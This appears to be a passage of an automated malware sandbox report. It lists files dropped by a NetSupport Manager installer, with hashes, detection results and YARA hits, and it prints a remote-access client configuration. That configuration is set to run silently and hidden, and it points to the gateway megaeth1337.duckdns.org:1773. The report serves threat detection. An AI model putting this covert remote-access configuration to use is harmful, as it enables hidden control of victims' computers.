                                                                                                                    MD5:AE3FA6BF777B0429B825FB6B028F8A48
                                                                                                                    SHA1:B53DBFDB7C8DEAA9A05381F5AC2E596830039838
                                                                                                                    SHA-256:66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB
                                                                                                                    SHA-512:1339E7CE01916573E7FDD71E331EEEE5E27B1DDD968CADFA6CBC73D58070B9C9F8D9515384AF004E5E015BD743C7A629EB0C62A6C0FA420D75B069096C5D1ECE
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24768
                                                                                                                    Entropy (8bit):6.784463110154403
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:vUFVhjW2hWcgbCA0GftpBjH95mnlvQyURz8te:szC8iEvU2Y
                                                                                                                    MD5:32D7B95B1BCE23DB9FBD0578053BA87F
                                                                                                                    SHA1:7E14A34AC667A087F66D576C65CD6FE6C1DFDD34
                                                                                                                    SHA-256:104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728
                                                                                                                    SHA-512:7DAD74A0E3820A8237BAB48F4962FE43E5B60B00F003A5DE563B4CF61EE206353C9689A639566DC009F41585B54B915FF04F014230F0F38416020E08C8A44CB4
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24768
                                                                                                                    Entropy (8bit):6.778007627268145
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:J6S5yguNvZ5VQgx3SbwA71IkF+w8iB66kP:Jl5yguNvZ5VQgx3SbwA71Itnb6kP
                                                                                                                    MD5:5E72659B38A2977984BBC23ED274F007
                                                                                                                    SHA1:EA622D608CC942BDB0FAD118C8060B60B2E985C9
                                                                                                                    SHA-256:44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA
                                                                                                                    SHA-512:ED3CB656A5F5AEE2CC04DD1F25B1390D52F3E85F0C7742ED0D473A117D2AC49E225A0CB324C31747D221617ABCD6A9200C16DD840284BB29155726A3AA749BB1
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):21184
                                                                                                                    Entropy (8bit):6.908629649625132
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:UzW2hWEgbCA0GftpBjJ6EKz3lvQyURz8X:y28i36bdvU2X
                                                                                                                    MD5:1FA7C2B81CDFD7ACE42A2A9A0781C946
                                                                                                                    SHA1:F5B7117D18A7335228829447E3ECCC7B806EF478
                                                                                                                    SHA-256:CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD
                                                                                                                    SHA-512:339CDAF8DE445CF05BC201400D65BB9037EA7A3782BA76864842ADB6FBE5445D06863227DD774AB50E6F582B75886B302D5DD152AFF1825CF90E4F252398ACE0
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):7.011995208399749
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
                                                                                                                    MD5:D6ABF5C056D80592F8E2439E195D61AC
                                                                                                                    SHA1:33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
                                                                                                                    SHA-256:8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
                                                                                                                    SHA-512:6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):551904
                                                                                                                    Entropy (8bit):5.925156666125814
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:YSQAix/cHSCXlYMPEvLrjORkDRZQxDChwuPJSKKu0T9ZNFvDvH:C23PE6RzDCnPJShu0/FvD
                                                                                                                    MD5:FE7D9DC26FF1615C13722E0F2DD3B815
                                                                                                                    SHA1:D36149AC1146404306224DFFD23AAFA748FBE5C0
                                                                                                                    SHA-256:09FDBC21AFDAAC95465BB2DD6F075C87443D7EC7F105DBDD61A515C25BC1C9FE
                                                                                                                    SHA-512:E371DC6D75A7A081E8C9F59CBB57133DD0D8B8A708F4FE0239D51CEF94B323468C3C6922BE0C3F896BA98289EB7C252CFEE1E42FA1211E2FFBDACC89DE2186DF
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):95872
                                                                                                                    Entropy (8bit):6.522984250421539
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:FjJGou6vXbHlVK4KGLyfTdvIZTkTavAiZQZ+oWDzFobYIWi5v2RviI:5Ja6vfK/GLYTq5kTatZEcJobwi5vGvr
                                                                                                                    MD5:38935DB0DD061269B7D79A1D287E750C
                                                                                                                    SHA1:B52E80F2421CEDF293EB8723FE32D8A91986228B
                                                                                                                    SHA-256:5A7E162064982B196F646DC3F4C4A5CC50858DA13BCFBA268F8BA0A6D9ABB741
                                                                                                                    SHA-512:2E8136C935D1CAD05CA1B9469238BFC3BCB3020A6F6E73949E8DA97F33133C8143119030210E58317DD484F7323FC197B6559B77055A76BCCA09232002A8E35A
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\clhook4.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):120288
                                                                                                                    Entropy (8bit):5.258524582048951
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:wfVZl6FhWr80/SqUr2pe/3NjHDHf/ckwGr2pe/k5XHDHf/ckVjp:w70hGaq0ee/3BjHdee/yXjHhjp
                                                                                                                    MD5:297EA82401ACBEAD6BA4B19880DF2B8C
                                                                                                                    SHA1:32664B5F0B27E26E75DBD97F1ED11397E4D1C9A6
                                                                                                                    SHA-256:72D9BD23541500A0F0FB657DA320A039894939500BE7D217C6627D05FCC5E629
                                                                                                                    SHA-512:C29951BED7CD6A6431BF15848DAFE3A438A05E1021EAC4B5A73585A6B39E7ECFB94567566D1641284533B80DBA3EF45070E933B98E472BF206E65CC5A6CE5B06
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):836
                                                                                                                    Entropy (8bit):5.502925006660024
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:nBhzEPmPT8FVXR8piBlnxOo31fXXfD+2ijr6cgEW3ZxAhU6L:nBtuK+VXypGlnxJ31fHfqj+cg3ZG
                                                                                                                    MD5:165A65E2FDE1870C85C463D021600B62
                                                                                                                    SHA1:16D38EAE2E83F532AF04117CEFF0D1DA80695076
                                                                                                                    SHA-256:8EF0F3A5FE3C2338E27BEFAAB18823135E22DA3462651FDA832D4C513F082BC6
                                                                                                                    SHA-512:8B7507AD5E91377FC50673C649B8FA26245504AF53200AFBE56130B67C05318E707CC642FF0A54771DEFD5AC87252684AB5245099C7CE2AA81F0C52B55A48D7D
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xf10b75ab....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..UsernamesU=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..PasswordU=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSKU=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250160
                                                                                                                    Entropy (8bit):6.6978319974134735
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:7tOrNG33aoeoMgFrxCCTZkogkArqfmUQr3fGkfJFCIZJ12z/bRbH:7tOrO3Ksko5Arq23AIZKzx
                                                                                                                    MD5:E5F65F0775313A0C23B3C61916C2C3EF
                                                                                                                    SHA1:CF84F9C9DF08D389C07C3E51EFDF7714D188BDFE
                                                                                                                    SHA-256:AF557540224984F759068120590A8178AB50406BCAE8812351B56B274BC6D4F5
                                                                                                                    SHA-512:15F9B9AEB40622EE9D6AD19CA17B1F1A1666BF8F33DC9A604E22F7550F4CA9BC7B0DD2AA6AF24E6EF534CCAC007E923C6CFF2507F7357489F5ADCA369D782B06
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2381
                                                                                                                    Entropy (8bit):5.374632099663492
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:E4hfow3Kqy0nxNrwN1XQmeFh+5XXdJpBsK38pwlFTP/Fs0cv:EBwG0xNrwN+qD3MpwlFL2tv
                                                                                                                    MD5:703C7774B981E5D02E058340A27A5B75
                                                                                                                    SHA1:37534D7F0B31D2328D70CA578047D597273B73B6
                                                                                                                    SHA-256:4CFCA868959F4E1B85BFD6B8A970AE06C0810D9C341F260DF3AB8479089500E9
                                                                                                                    SHA-512:758E84915FA7EBB343BAFD096BC40D9D226FE0DA7C167B2B8E59F664E1BE796143228BC3405DF7E3447CDC918004DB516344365D3D07A8E6C040DF2B90456D78
                                                                                                                    Malicious:false
                                                                                                                    Preview:; gdihook5.inf..; Installation inf for the gdihook5 mirror driver...; copyright (c) 2011 NetSupport Ltd....[Version]..Signature="$WINDOWS NT$"..Provider=%PCI%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=08/14/2011,11.11.0.704..CatalogFile=gdihook5.cat....[DestinationDirs]..DefaultDestDir = 11..gdihook5.Miniport = 12 ; drivers..gdihook5.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%PCI% = gdihook5.Mfg, NTx86, NTamd64....[gdihook5.Mfg.NTx86]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....[gdihook5.Mfg.NTamd64]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....;..; General installation section..;....[gdihook5]..FeatureScore=FC..CopyFiles=gdihook5.Miniport, gdihook5.Display....;..; File sections..;....[gdihook5.Miniport]..gdihook5.sys....[gdihook5.Display]..gdihook5.dll......;..; Service Installation..;....[gdihook5.Services]..AddService = gdihook5, 0x00000002, gdihook5_Service_Inst....[gdihook5_Service_Inst]
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):8991
                                                                                                                    Entropy (8bit):6.951682034433646
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:iEd0VE3v3k08ywwlhjeyveCtAW5LfsxhQ8eVC:iDwPjpvjAGLa3x
                                                                                                                    MD5:2D31CE5FE7CD81C996615EBCC29C058A
                                                                                                                    SHA1:4D74FE8E3170D36666DF779E43FE8016986B154A
                                                                                                                    SHA-256:019290C9B7E5B48FB6DE95F9563ED481CD42F8658451C6FBC8AD131D61209CE0
                                                                                                                    SHA-512:B8188481050630E7317D2F0687790A46E86F30A79F34164E4B02EC28DA39334DA80BD494A4F32AE8BB60FA2F01273CDCD9D15100F901517B0C01507678330052
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):59872
                                                                                                                    Entropy (8bit):6.890148857867
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:YKLLK1jLIrJUw9Dyehz6mnTEDtGCd3FN+r2pe/q3HDHf/ckBr2pe/NyHDHf/ckt:YKLLKS9Dvhu5NOee/ajHxee/UjHR
                                                                                                                    MD5:7AC62F00194B01935EA6A35CF8884912
                                                                                                                    SHA1:7A04936B6C234AA924AD3293188A39B3CC49AD3A
                                                                                                                    SHA-256:5B87FAFB20833B4803F829C6816235048566579F6C72EF44B6FDE1F54195384F
                                                                                                                    SHA-512:86A98BF85142DFF3F6643B964579D2AC2438BE9A3D644E2C0E1BD3FF055C0CE17ACFC689503AB0A9AFB4E495B406592597F613F47C12E8E2413F6AA89E0B5FD7
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2578344
                                                                                                                    Entropy (8bit):6.251948534749446
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:49152:4X0hD1wHH5cvdcSvrIq8hJ1CPwDv3uFh+OfXXU:4X0hD1w21csIq831CPwDv3uFh+j
                                                                                                                    MD5:8A04281ABC13FE1D4C8587AE9D177C42
                                                                                                                    SHA1:72C2FCB96404C32C8BD8D1B2752B0B24CE9AB539
                                                                                                                    SHA-256:DD697C680C7296FE84F8761C54D7DAEED41222E86D409A4751F5A53B16A82B0B
                                                                                                                    SHA-512:DD13813A32C1561115C1B61B50F56B560A1C2BF27F061A9E7B328937DC896150B4C31AC57BFEA475DA8ED08996F708C8724B9D50FC2DC2D59EAF25CACE32D112
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):555944
                                                                                                                    Entropy (8bit):5.860497620903766
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aVM2qk4ikDJj2hZuF/fpGzBqGPeck8p22gU2lvzaP1r4:X2q7ikLXg+c7wU2lvzaPi
                                                                                                                    MD5:D559D1B694B817E3E3E15200AF4603F6
                                                                                                                    SHA1:4D486E5D8171973C17E61ACA47FC97A71BC9EB7E
                                                                                                                    SHA-256:407C28909CEA2ADC3B2B2A1F89132A543F57EFF9D96CDAA5DEEF5109CB2CA770
                                                                                                                    SHA-512:6480B2F66558BDB5D0243E66AECD4E9B347BC5A67B829AE1980043AC487290B8CF04C43F3294E4160B5CA4F604D1C17000458EEBF759A530C5B79E2A952A72BB
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PNG image data, 300 x 77, 8-bit/color RGBA, non-interlaced
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6843
                                                                                                                    Entropy (8bit):7.939767423234445
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:YSH/KoQ1X5F8VX3JNHimWaMp3Lu0FEkxpGAlNjGJHpLgwDy+eFyb:fyl/aVXK7u09JNoJ0wDy+C+
                                                                                                                    MD5:9A9827C570F102CA3366E549A047B99A
                                                                                                                    SHA1:682C7A3612B300B1F3D0B5E0BE557ED148003DE0
                                                                                                                    SHA-256:F1F79307A3352EFB6CE296EED242F368C4724144B7B2F624C1B4223C7952A2C9
                                                                                                                    SHA-512:8BBFA11F841276A07E29E8D042FD4436C569BA984A56F6EB45D9D73A65BE7EBFECF8D8BC81D122FCF9DE4814A41EF38E7150EFAA8D06C0BE0145B74712D5E834
                                                                                                                    Malicious:false
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4397384
                                                                                                                    Entropy (8bit):7.044443988235452
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:WEWsrhmswShHpSvnB5MnhpTnWbWA7ySeAfCt0PfI9jWwg76YAvvU+uFLOAkGkzdz:W6DWbLRojDbvU+uFLOyomFHKnPA25
                                                                                                                    MD5:493FC0F59054A6F4F3775655FB55295C
                                                                                                                    SHA1:2AFE4F5EB626FB5C5AA5BB6C2BC61C88E37CF42F
                                                                                                                    SHA-256:CAC58C98F7E587BA1B2A4F41874764B59BDF6CB684A4A44AEE93F91B3B9A019B
                                                                                                                    SHA-512:9DA41078A65A6B8C731388CCF4CE2A988705305F29F0841039B96CD2649F82E8EA219F082DE184826E39F0EDAA4A1D9AFF2E60EBB8D27771222D0C7CB165598D
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4422992
                                                                                                                    Entropy (8bit):7.012472770624414
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:jsWbb5oF0MUVVsK3vOGH+1TSlUE7vrffTTnm7ulf67NACOub7FLOAkGkzdnEVomK:jx5x3Ii6F7FLOyomFHKnPA+
                                                                                                                    MD5:F32077DF74EFD435A1DCDF415E189DF1
                                                                                                                    SHA1:2771393D56FF167275BF03170377C43C28EE14E1
                                                                                                                    SHA-256:24BB6838DEFD491DF5460A88BED2D70B903A2156C49FB63E214E2C77251ECA71
                                                                                                                    SHA-512:FB708E0949854998FB80635138C80AC05D77DCA3089D3E5974663DDF2376D6A03535DAE1A068514C3B58BC06C8E4078B37CFB6BC90F080F7F31FEFC972A34850
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):5178656
                                                                                                                    Entropy (8bit):6.880627623004376
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:DEl4oAxkdYqhHRMg7R/dRwIc/3jYkCw055xXtQo7h6jBPgUYcupFLOAkGkzdnEVM:DlEdLhxM+/TwIc/j65x9aZgUYcaFLOyM
                                                                                                                    MD5:835F7A6C55D49EAE72A482D781B1EAD8
                                                                                                                    SHA1:CC63546F46E0BDA33EFFF2CDA121219667EB70E3
                                                                                                                    SHA-256:A52B83AC23739BCC8B0E89D1EFC05A199FE7CF8914D3F42C8DB5560CADB105E7
                                                                                                                    SHA-512:F0F0B36502AB2E3283ACD87171E0F7FE823515A4DCE7C70079AB26D3F75096E9A05EA6E0377E50ACF21B491AFE404DABFFBD0D91D6421C0B337CB3C6CE72CB24
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):421200
                                                                                                                    Entropy (8bit):6.595942471932211
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:Seb8zxr1aWPaHX7dGP5frhUgiW6QR7t5qv3Ooc8UHkC2e7wx:Seb8Fpa6aHX7dGP5Gv3Ooc8UHkC2ekx
                                                                                                                    MD5:BC83108B18756547013ED443B8CDB31B
                                                                                                                    SHA1:79BCAAD3714433E01C7F153B05B781F8D7CB318D
                                                                                                                    SHA-256:B2AD109C15EAA92079582787B7772BA0A2F034F7D075907FF87028DF0EAEA671
                                                                                                                    SHA-512:6E72B2D40E47567B3E506BE474DAFA7CACD0B53CD2C2D160C3B5384F2F461FC91BB5FDB614A351F628D4E516B3BBDABC2CC6D4CB4710970146D2938A687DD011
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):462120
                                                                                                                    Entropy (8bit):6.664460200008014
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:U3QUergtVD7jfIobCFvUk5ShUgiW6QR7t5s03Ooc8dHkC2esIj:9UXzD3IoCFvUG03Ooc8dHkC2eJj
                                                                                                                    MD5:11BC8B95833B52E09DAC5EC36F09C125
                                                                                                                    SHA1:8ED0EA8ACB742F084816261E7CD5AAB5B98E22BE
                                                                                                                    SHA-256:32882ABB46333874F3DD9B3648CEA6DE18D75D04863C2CD2F1BCDDBF348E3A26
                                                                                                                    SHA-512:0FE24A5C910CCA7FD1BDB7D5988FE8ABC210A859D42AA0234D969F0911207E50D48AF244B0A2E86E0A66A3FFE981E5F48E2DD72A8D62FD1B53FD4B9ED531658E
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):773968
                                                                                                                    Entropy (8bit):6.901559811406837
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                    MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                    SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                    SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                    SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:Windows setup INFormation
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):328
                                                                                                                    Entropy (8bit):4.93007757242403
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                    MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                    SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                    SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                    SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                    Malicious:false
                                                                                                                    Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):33408
                                                                                                                    Entropy (8bit):6.382369861010622
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                                                    MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                                                    SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                                                    SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                                                    SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):34008
                                                                                                                    Entropy (8bit):6.39207103344199
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                                                    MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                                                    SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                                                    SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                                                    SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                                                    Malicious:true
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:MS Windows HtmlHelp Data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1205074
                                                                                                                    Entropy (8bit):7.972382983591089
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:JjcLsXXg/ijPaKIpt42tePKWs0u0jippHik509oh96IWIXqdgFbpcLnuTAOkvlI8:JjcLsXXg/ijPaKIpt42tePKWs0u0j8p0
                                                                                                                    MD5:6F293EC153DACA9796FD1E9C9C2B095E
                                                                                                                    SHA1:C9B280CDD81931D2CD95102FA04B96BA42F02E06
                                                                                                                    SHA-256:344DC9D97915EC8E4215A866F92E0BC4A50252B25534AD403105E00A750346FF
